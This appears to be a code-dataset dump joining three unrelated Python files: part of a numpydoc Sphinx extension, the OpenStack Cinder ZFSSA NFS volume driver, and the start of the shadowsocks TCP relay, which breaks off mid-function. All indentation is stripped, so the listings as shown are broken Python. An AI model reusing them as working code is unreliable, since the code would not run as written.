from sphinx.util.compat import Directive
import inspect
def mangle_docstrings(app, what, name, obj, options, lines,
reference_offset=[0]):
cfg = dict(use_plots=app.config.numpydoc_use_plots,
show_class_members=app.config.numpydoc_show_class_members)
if what == 'module':
# Strip top title
title_re = re.compile(ur'^\s*[#*=]{4,}\n[a-z0-9 -]+\n[#*=]{4,}\s*',
re.I|re.S)
lines[:] = title_re.sub(u'', u"\n".join(lines)).split(u"\n")
else:
doc = get_doc_object(obj, what, u"\n".join(lines), config=cfg)
lines[:] = unicode(doc).split(u"\n")
if app.config.numpydoc_edit_link and hasattr(obj, '__name__') and \
obj.__name__:
if hasattr(obj, '__module__'):
v = dict(full_name=u"%s.%s" % (obj.__module__, obj.__name__))
else:
v = dict(full_name=obj.__name__)
lines += [u'', u'.. htmlonly::', '']
lines += [u' %s' % x for x in
(app.config.numpydoc_edit_link % v).split("\n")]
# replace reference numbers so that there are no duplicates
references = []
for line in lines:
line = line.strip()
m = re.match(ur'^.. \[([a-z0-9_.-])\]', line, re.I)
if m:
references.append(m.group(1))
# start renaming from the longest string, to avoid overwriting parts
references.sort(key=lambda x: -len(x))
if references:
for i, line in enumerate(lines):
for r in references:
if re.match(ur'^\d+$', r):
new_r = u"R%d" % (reference_offset[0] + int(r))
else:
new_r = u"%s%d" % (r, reference_offset[0])
lines[i] = lines[i].replace(u'[%s]_' % r,
u'[%s]_' % new_r)
lines[i] = lines[i].replace(u'.. [%s]' % r,
u'.. [%s]' % new_r)
reference_offset[0] += len(references)
def mangle_signature(app, what, name, obj, options, sig, retann):
# Do not try to inspect classes that don't define `__init__`
if (inspect.isclass(obj) and
(not hasattr(obj, '__init__') or
'initializes x; see ' in pydoc.getdoc(obj.__init__))):
return '', ''
if not (callable(obj) or hasattr(obj, '__argspec_is_invalid_')): return
if not hasattr(obj, '__doc__'): return
doc = SphinxDocString(pydoc.getdoc(obj))
if doc['Signature']:
sig = re.sub(u"^[^(]*", u"", doc['Signature'])
return sig, u''
def setup(app, get_doc_object_=get_doc_object):
global get_doc_object
get_doc_object = get_doc_object_
app.connect('autodoc-process-docstring', mangle_docstrings)
app.connect('autodoc-process-signature', mangle_signature)
app.add_config_value('numpydoc_edit_link', None, False)
app.add_config_value('numpydoc_use_plots', None, False)
app.add_config_value('numpydoc_show_class_members', True, True)
# Extra mangling domains
app.add_domain(NumpyPythonDomain)
app.add_domain(NumpyCDomain)
#------------------------------------------------------------------------------
# Docstring-mangling domains
#------------------------------------------------------------------------------
from docutils.statemachine import ViewList
from sphinx.domains.c import CDomain
from sphinx.domains.python import PythonDomain
class ManglingDomainBase(object):
directive_mangling_map = {}
def __init__(self, *a, **kw):
super(ManglingDomainBase, self).__init__(*a, **kw)
self.wrap_mangling_directives()
def wrap_mangling_directives(self):
for name, objtype in self.directive_mangling_map.items():
self.directives[name] = wrap_mangling_directive(
self.directives[name], objtype)
class NumpyPythonDomain(ManglingDomainBase, PythonDomain):
name = 'np'
directive_mangling_map = {
'function': 'function',
'class': 'class',
'exception': 'class',
'method': 'function',
'classmethod': 'function',
'staticmethod': 'function',
'attribute': 'attribute',
}
class NumpyCDomain(ManglingDomainBase, CDomain):
name = 'np-c'
directive_mangling_map = {
'function': 'function',
'member': 'attribute',
'macro': 'function',
'type': 'class',
'var': 'object',
}
def wrap_mangling_directive(base_directive, objtype):
class directive(base_directive):
def run(self):
env = self.state.document.settings.env
name = None
if self.arguments:
m = re.match(r'^(.*\s+)?(.*?)(\(.*)?', self.arguments[0])
name = m.group(2).strip()
if not name:
name = self.arguments[0]
lines = list(self.content)
mangle_docstrings(env.app, objtype, name, None, None, lines)
self.content = ViewList(lines, self.content.parent)
return base_directive.run(self)
return directive
|
duhzecca/cinder
|
refs/heads/master
|
cinder/volume/drivers/zfssa/zfssanfs.py
|
11
|
# Copyright (c) 2014, 2015, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance NFS Cinder Volume Driver
"""
import base64
import datetime as dt
import errno
import math
from oslo_config import cfg
from oslo_log import log
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder import exception
from cinder import utils
from cinder.i18n import _, _LE, _LI
from cinder.volume.drivers import nfs
from cinder.volume.drivers.san import san
from cinder.volume.drivers.zfssa import zfssarest
ZFSSA_OPTS = [
cfg.StrOpt('zfssa_data_ip',
help='Data path IP address'),
cfg.StrOpt('zfssa_https_port', default='443',
help='HTTPS port number'),
cfg.StrOpt('zfssa_nfs_mount_options', default='',
help='Options to be passed while mounting share over nfs'),
cfg.StrOpt('zfssa_nfs_pool', default='',
help='Storage pool name.'),
cfg.StrOpt('zfssa_nfs_project', default='NFSProject',
help='Project name.'),
cfg.StrOpt('zfssa_nfs_share', default='nfs_share',
help='Share name.'),
cfg.StrOpt('zfssa_nfs_share_compression', default='off',
choices=['off', 'lzjb', 'gzip-2', 'gzip', 'gzip-9'],
help='Data compression.'),
cfg.StrOpt('zfssa_nfs_share_logbias', default='latency',
choices=['latency', 'throughput'],
help='Synchronous write bias-latency, throughput.'),
cfg.IntOpt('zfssa_rest_timeout',
help='REST connection timeout. (seconds)'),
cfg.BoolOpt('zfssa_enable_local_cache', default=True,
help='Flag to enable local caching: True, False.'),
cfg.StrOpt('zfssa_cache_directory', default='os-cinder-cache',
help='Name of directory inside zfssa_nfs_share where cache '
'volumes are stored.')
]
LOG = log.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(ZFSSA_OPTS)
def factory_zfssa():
return zfssarest.ZFSSANfsApi()
class ZFSSANFSDriver(nfs.NfsDriver):
"""ZFSSA Cinder NFS volume driver.
Version history:
1.0.1:
Backend enabled volume migration.
Local cache feature.
"""
VERSION = '1.0.1'
volume_backend_name = 'ZFSSA_NFS'
protocol = driver_prefix = driver_volume_type = 'nfs'
def __init__(self, *args, **kwargs):
super(ZFSSANFSDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(ZFSSA_OPTS)
self.configuration.append_config_values(san.san_opts)
self.zfssa = None
self._stats = None
def do_setup(self, context):
if not self.configuration.nfs_oversub_ratio > 0:
msg = _("NFS config 'nfs_oversub_ratio' invalid. Must be > 0: "
"%s") % self.configuration.nfs_oversub_ratio
LOG.error(msg)
raise exception.NfsException(msg)
if ((not self.configuration.nfs_used_ratio > 0) and
(self.configuration.nfs_used_ratio <= 1)):
msg = _("NFS config 'nfs_used_ratio' invalid. Must be > 0 "
"and <= 1.0: %s") % self.configuration.nfs_used_ratio
LOG.error(msg)
raise exception.NfsException(msg)
package = 'mount.nfs'
try:
self._execute(package, check_exit_code=False, run_as_root=True)
except OSError as exc:
if exc.errno == errno.ENOENT:
msg = _('%s is not installed') % package
raise exception.NfsException(msg)
else:
raise
lcfg = self.configuration
LOG.info(_LI('Connecting to host: %s.'), lcfg.san_ip)
host = lcfg.san_ip
user = lcfg.san_login
password = lcfg.san_password
https_port = lcfg.zfssa_https_port
credentials = ['san_ip', 'san_login', 'san_password', 'zfssa_data_ip']
for cred in credentials:
if not getattr(lcfg, cred, None):
exception_msg = _('%s not set in cinder.conf') % cred
LOG.error(exception_msg)
raise exception.CinderException(exception_msg)
self.zfssa = factory_zfssa()
self.zfssa.set_host(host, timeout=lcfg.zfssa_rest_timeout)
auth_str = base64.encodestring('%s:%s' % (user, password))[:-1]
self.zfssa.login(auth_str)
self.zfssa.create_project(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
compression=lcfg.zfssa_nfs_share_compression,
logbias=lcfg.zfssa_nfs_share_logbias)
share_args = {
'sharedav': 'rw',
'sharenfs': 'rw',
'root_permissions': '777',
'compression': lcfg.zfssa_nfs_share_compression,
'logbias': lcfg.zfssa_nfs_share_logbias
}
self.zfssa.create_share(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share, share_args)
share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,
lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share)
mountpoint = share_details['mountpoint']
self.mount_path = lcfg.zfssa_data_ip + ':' + mountpoint
https_path = 'https://' + lcfg.zfssa_data_ip + ':' + https_port + \
'/shares' + mountpoint
LOG.debug('NFS mount path: %s', self.mount_path)
LOG.debug('WebDAV path to the share: %s', https_path)
self.shares = {}
mnt_opts = self.configuration.zfssa_nfs_mount_options
self.shares[self.mount_path] = mnt_opts if len(mnt_opts) > 1 else None
# Initialize the WebDAV client
self.zfssa.set_webdav(https_path, auth_str)
# Edit http service so that WebDAV requests are always authenticated
args = {'https_port': https_port,
'require_login': True}
self.zfssa.modify_service('http', args)
self.zfssa.enable_service('http')
if lcfg.zfssa_enable_local_cache:
LOG.debug('Creating local cache directory %s.',
lcfg.zfssa_cache_directory)
self.zfssa.create_directory(lcfg.zfssa_cache_directory)
def _ensure_shares_mounted(self):
try:
self._ensure_share_mounted(self.mount_path)
except Exception as exc:
LOG.error(_LE('Exception during mounting %s.'), exc)
self._mounted_shares = [self.mount_path]
LOG.debug('Available shares %s', self._mounted_shares)
def check_for_setup_error(self):
"""Check that driver can login.
Check also for properly configured pool, project and share
Check that the http and nfs services are enabled
"""
lcfg = self.configuration
self.zfssa.verify_pool(lcfg.zfssa_nfs_pool)
self.zfssa.verify_project(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project)
self.zfssa.verify_share(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share)
self.zfssa.verify_service('http')
self.zfssa.verify_service('nfs')
def create_snapshot(self, snapshot):
"""Creates a snapshot of a volume."""
LOG.info(_LI('Creating snapshot: %s'), snapshot['name'])
lcfg = self.configuration
snap_name = self._create_snapshot_name()
self.zfssa.create_snapshot(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share, snap_name)
src_file = snap_name + '/' + snapshot['volume_name']
try:
self.zfssa.create_snapshot_of_volume_file(src_file=src_file,
dst_file=
snapshot['name'])
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug('Error thrown during snapshot: %s creation',
snapshot['name'])
finally:
self.zfssa.delete_snapshot(lcfg.zfssa_nfs_pool,
lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share, snap_name)
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
LOG.info(_LI('Deleting snapshot: %s'), snapshot['name'])
self.zfssa.delete_snapshot_of_volume_file(src_file=snapshot['name'])
def create_volume_from_snapshot(self, volume, snapshot, method='COPY'):
LOG.info(_LI('Creatng volume from snapshot. volume: %s'),
volume['name'])
LOG.info(_LI('Source Snapshot: %s'), snapshot['name'])
self._ensure_shares_mounted()
self.zfssa.create_volume_from_snapshot_file(src_file=snapshot['name'],
dst_file=volume['name'],
method=method)
volume['provider_location'] = self.mount_path
if volume['size'] != snapshot['volume_size']:
try:
self.extend_volume(volume, volume['size'])
except Exception:
vol_path = self.local_path(volume)
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error in extending volume size: Volume: '
'%(volume)s Vol_Size: %(vol_size)d with '
'Snapshot: %(snapshot)s Snap_Size: '
'%(snap_size)d'),
{'volume': volume['name'],
'vol_size': volume['size'],
'snapshot': snapshot['name'],
'snap_size': snapshot['volume_size']})
self._execute('rm', '-f', vol_path, run_as_root=True)
volume_origin = {'origin': snapshot['volume_name']}
self.zfssa.set_file_props(volume['name'], volume_origin)
return {'provider_location': volume['provider_location']}
def create_cloned_volume(self, volume, src_vref):
"""Creates a snapshot and then clones the snapshot into a volume."""
LOG.info(_LI('new cloned volume: %s'), volume['name'])
LOG.info(_LI('source volume for cloning: %s'), src_vref['name'])
snapshot = {'volume_name': src_vref['name'],
'volume_id': src_vref['id'],
'volume_size': src_vref['size'],
'name': self._create_snapshot_name()}
self.create_snapshot(snapshot)
return self.create_volume_from_snapshot(volume, snapshot,
method='MOVE')
def delete_volume(self, volume):
LOG.debug('Deleting volume %s.', volume['name'])
lcfg = self.configuration
try:
vol_props = self.zfssa.get_volume(volume['name'])
except exception.VolumeNotFound:
return
super(ZFSSANFSDriver, self).delete_volume(volume)
if vol_props['origin'].startswith(lcfg.zfssa_cache_directory):
LOG.info(_LI('Checking origin %(origin)s of volume %(volume)s.'),
{'origin': vol_props['origin'],
'volume': volume['name']})
self._check_origin(vol_props['origin'])
def clone_image(self, context, volume,
image_location, image_meta,
image_service):
"""Create a volume efficiently from an existing image.
Verify the image ID being used:
(1) If there is no existing cache volume, create one and transfer
image data to it. Take a snapshot.
(2) If a cache volume already exists, verify if it is either alternated
or updated. If so try to remove it, raise exception if removal fails.
Create a new cache volume as in (1).
Clone a volume from the cache volume and returns it to Cinder.
"""
LOG.debug('Cloning image %(image)s to volume %(volume)s',
{'image': image_meta['id'], 'volume': volume['name']})
lcfg = self.configuration
if not lcfg.zfssa_enable_local_cache:
return None, False
# virtual_size is the image's actual size when stored in a volume
# virtual_size is expected to be updated manually through glance
try:
virtual_size = int(image_meta['properties'].get('virtual_size'))
except Exception:
LOG.error(_LE('virtual_size property is not set for the image.'))
return None, False
cachevol_size = int(math.ceil(float(virtual_size) / units.Gi))
if cachevol_size > volume['size']:
exception_msg = (_LE('Image size %(img_size)dGB is larger '
'than volume size %(vol_size)dGB.'),
{'img_size': cachevol_size,
'vol_size': volume['size']})
LOG.error(exception_msg)
return None, False
cache_dir = '%s/' % lcfg.zfssa_cache_directory
updated_at = six.text_type(image_meta['updated_at'].isoformat())
cachevol_props = {
'name': '%sos-cache-vol-%s' % (cache_dir,
image_meta['id']),
'size': cachevol_size,
'updated_at': updated_at,
'image_id': image_meta['id'],
}
try:
cachevol_name = self._verify_cache_volume(context,
image_meta,
image_service,
cachevol_props)
# A cache volume should be ready by now
# Create a clone from the cache volume
cache_vol = {
'name': cachevol_name,
'size': cachevol_size,
'id': image_meta['id'],
}
clone_vol = self.create_cloned_volume(volume, cache_vol)
self._update_origin(volume['name'], cachevol_name)
except exception.VolumeBackendAPIException as exc:
exception_msg = (_LE('Cannot clone image %(image)s to '
'volume %(volume)s. Error: %(error)s.'),
{'volume': volume['name'],
'image': image_meta['id'],
'error': exc.message})
LOG.error(exception_msg)
return None, False
return clone_vol, True
@utils.synchronized('zfssanfs', external=True)
def _verify_cache_volume(self, context, img_meta,
img_service, cachevol_props):
"""Verify if we have a cache volume that we want.
If we don't, create one.
If we do, check if it's been updated:
* If so, delete it and recreate a new volume
* If not, we are good.
If it's out of date, delete it and create a new one.
After the function returns, there should be a cache volume available,
ready for cloning.
"""
cachevol_name = cachevol_props['name']
cache_vol = None
LOG.debug('Verifying cache volume %s:', cachevol_name)
try:
cache_vol = self.zfssa.get_volume(cachevol_name)
except exception.VolumeNotFound:
# There is no existing cache volume, create one:
LOG.debug('Cache volume not found. Creating one...')
return self._create_cache_volume(context,
img_meta,
img_service,
cachevol_props)
# A cache volume does exist, check if it's updated:
if ((cache_vol['updated_at'] != cachevol_props['updated_at']) or
(cache_vol['image_id'] != cachevol_props['image_id'])):
if cache_vol['numclones'] > 0:
# The cache volume is updated, but has clones
exception_msg = (_('Cannot delete '
'cache volume: %(cachevol_name)s. '
'It was updated at %(updated_at)s '
'and currently has %(numclones)d '
'volume instances.'),
{'cachevol_name': cachevol_name,
'updated_at': cachevol_props['updated_at'],
'numclones': cache_vol['numclones']})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
# The cache volume is updated, but has no clone, so we delete it
# and re-create a new one:
cache_vol = {
'provider_location': self.mount_path,
'name': cachevol_name,
}
self.delete_volume(cache_vol)
return self._create_cache_volume(context,
img_meta,
img_service,
cachevol_props)
return cachevol_name
def _create_cache_volume(self, context, img_meta,
img_service, cachevol_props):
"""Create a cache volume from an image.
Returns name of the cache volume.
"""
cache_vol = {
'provider_location': self.mount_path,
'size': cachevol_props['size'],
'name': cachevol_props['name'],
}
LOG.debug('Creating cache volume %s', cache_vol['name'])
try:
super(ZFSSANFSDriver, self).create_volume(cache_vol)
LOG.debug('Copying image data:')
super(ZFSSANFSDriver, self).copy_image_to_volume(context,
cache_vol,
img_service,
img_meta['id'])
except Exception as exc:
exc_msg = (_('Fail to create cache volume %(volume)s. '
'Error: %(err)s'),
{'volume': cache_vol['name'],
'err': six.text_type(exc)})
LOG.error(exc_msg)
self.zfssa.delete_file(cache_vol['name'])
raise exception.VolumeBackendAPIException(data=exc_msg)
cachevol_meta = {
'updated_at': cachevol_props['updated_at'],
'image_id': cachevol_props['image_id'],
}
cachevol_meta.update({'numclones': '0'})
self.zfssa.set_file_props(cache_vol['name'], cachevol_meta)
return cache_vol['name']
def _create_snapshot_name(self):
"""Creates a snapshot name from the date and time."""
return ('cinder-zfssa-nfs-snapshot-%s' %
dt.datetime.utcnow().isoformat())
def _get_share_capacity_info(self):
"""Get available and used capacity info for the NFS share."""
lcfg = self.configuration
share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,
lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share)
free = share_details['space_available']
used = share_details['space_total']
return free, used
@utils.synchronized('zfssanfs', external=True)
def _check_origin(self, origin):
"""Verify the cache volume of a bootable volume.
If the cache no longer has clone, it will be deleted.
"""
cachevol_props = self.zfssa.get_volume(origin)
numclones = cachevol_props['numclones']
LOG.debug('Number of clones: %d', numclones)
if numclones <= 1:
# This cache vol does not have any other clone
self.zfssa.delete_file(origin)
else:
cachevol_props = {'numclones': six.text_type(numclones - 1)}
self.zfssa.set_file_props(origin, cachevol_props)
@utils.synchronized('zfssanfs', external=True)
def _update_origin(self, vol_name, cachevol_name):
"""Update WebDAV property of a volume.
WebDAV properties are used to keep track of:
(1) The number of clones of a cache volume.
(2) The cache volume name (origin) of a bootable volume.
To avoid race conditions when multiple volumes are created and needed
to be updated, a file lock is used to ensure that the properties are
updated properly.
"""
volume_origin = {'origin': cachevol_name}
self.zfssa.set_file_props(vol_name, volume_origin)
cache_props = self.zfssa.get_volume(cachevol_name)
cache_props.update({'numclones':
six.text_type(cache_props['numclones'] + 1)})
self.zfssa.set_file_props(cachevol_name, cache_props)
def _update_volume_stats(self):
"""Get volume stats from zfssa"""
self._ensure_shares_mounted()
data = {}
lcfg = self.configuration
backend_name = self.configuration.safe_get('volume_backend_name')
data['volume_backend_name'] = backend_name or self.__class__.__name__
data['vendor_name'] = 'Oracle'
data['driver_version'] = self.VERSION
data['storage_protocol'] = self.protocol
asn = self.zfssa.get_asn()
data['location_info'] = '%s:%s' % (asn, lcfg.zfssa_nfs_share)
free, used = self._get_share_capacity_info()
capacity = float(free) + float(used)
ratio_used = used / capacity
data['QoS_support'] = False
data['reserved_percentage'] = 0
if ratio_used > self.configuration.nfs_used_ratio or \
ratio_used >= self.configuration.nfs_oversub_ratio:
data['reserved_percentage'] = 100
data['total_capacity_gb'] = float(capacity) / units.Gi
data['free_capacity_gb'] = float(free) / units.Gi
self._stats = data
def migrate_volume(self, ctxt, volume, host):
LOG.debug('Attempting ZFSSA enabled volume migration. volume: %(id)s, '
'host: %(host)s, status=%(status)s',
{'id': volume['id'],
'host': host,
'status': volume['status']})
lcfg = self.configuration
default_ret = (False, None)
if volume['status'] != "available":
LOG.debug('Only available volumes can be migrated using backend '
'assisted migration. Defaulting to generic migration.')
return default_ret
if (host['capabilities']['vendor_name'] != 'Oracle' or
host['capabilities']['storage_protocol'] != self.protocol):
LOG.debug('Source and destination drivers need to be Oracle iSCSI '
'to use backend assisted migration. Defaulting to '
'generic migration.')
return default_ret
if 'location_info' not in host['capabilities']:
LOG.debug('Could not find location_info in capabilities reported '
'by the destination driver. Defaulting to generic '
'migration.')
return default_ret
loc_info = host['capabilities']['location_info']
try:
(tgt_asn, tgt_share) = loc_info.split(':')
except ValueError:
LOG.error(_LE("Location info needed for backend enabled volume "
"migration not in correct format: %s. Continuing "
"with generic volume migration."), loc_info)
return default_ret
src_asn = self.zfssa.get_asn()
if tgt_asn == src_asn and lcfg.zfssa_nfs_share == tgt_share:
LOG.info(_LI('Source and destination ZFSSA shares are the same. '
'Do nothing. volume: %s'), volume['name'])
return (True, None)
return (False, None)
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update for migrated volume.
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:return model_update to update DB with any needed changes
"""
original_name = CONF.volume_name_template % volume['id']
current_name = CONF.volume_name_template % new_volume['id']
LOG.debug('Renaming migrated volume: %(cur)s to %(org)s.',
{'cur': current_name,
'org': original_name})
self.zfssa.create_volume_from_snapshot_file(src_file=current_name,
dst_file=original_name,
method='MOVE')
provider_location = new_volume['provider_location']
return {'_name_id': None, 'provider_location': provider_location}
|
zyingp/shadowsocks
|
refs/heads/master
|
shadowsocks/tcprelay.py
|
922
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, shell, common
from shadowsocks.common import parse_header
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
MSG_FASTOPEN = 0x20000000
# SOCKS command definition
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, it could be at one of several stages:
# as sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# as ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# for each handler, we have 2 stream directions:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
STREAM_UP = 0
STREAM_DOWN = 1
# for each stream, it's waiting for reading, or writing, or both
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 32 * 1024
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
# TCP Relay works as either sslocal or ssserver
# if is_local, this is sslocal
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._client_address = local_sock.getpeername()[:2]
self._remote_address = None
if 'forbidden_ip' in config:
self._forbidden_iplist = config['forbidden_ip']
else:
self._forbidden_iplist = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR,
self._server)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
def _update_activity(self, data_len=0):
# tell the TCP Relay we have activities recently
# else it will think we are inactive and timed out
self._server.update_activity(self, data_len)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data are written, put remaining in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
shell.print_exception(e)
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR, self._server)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN, self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d from %s:%d' %
(common.to_str(remote_addr), remote_port,
self._client_address[0], self._client_address[1]))
self._remote_address = (common.to_str(remote_addr), remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
self._log_error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
if self._forbidden_iplist:
if common.to_str(sa[0]) in self._forbidden_iplist:
raise Exception('IP %s is in forbidden list, reject' %
common.to_str(sa[0]))
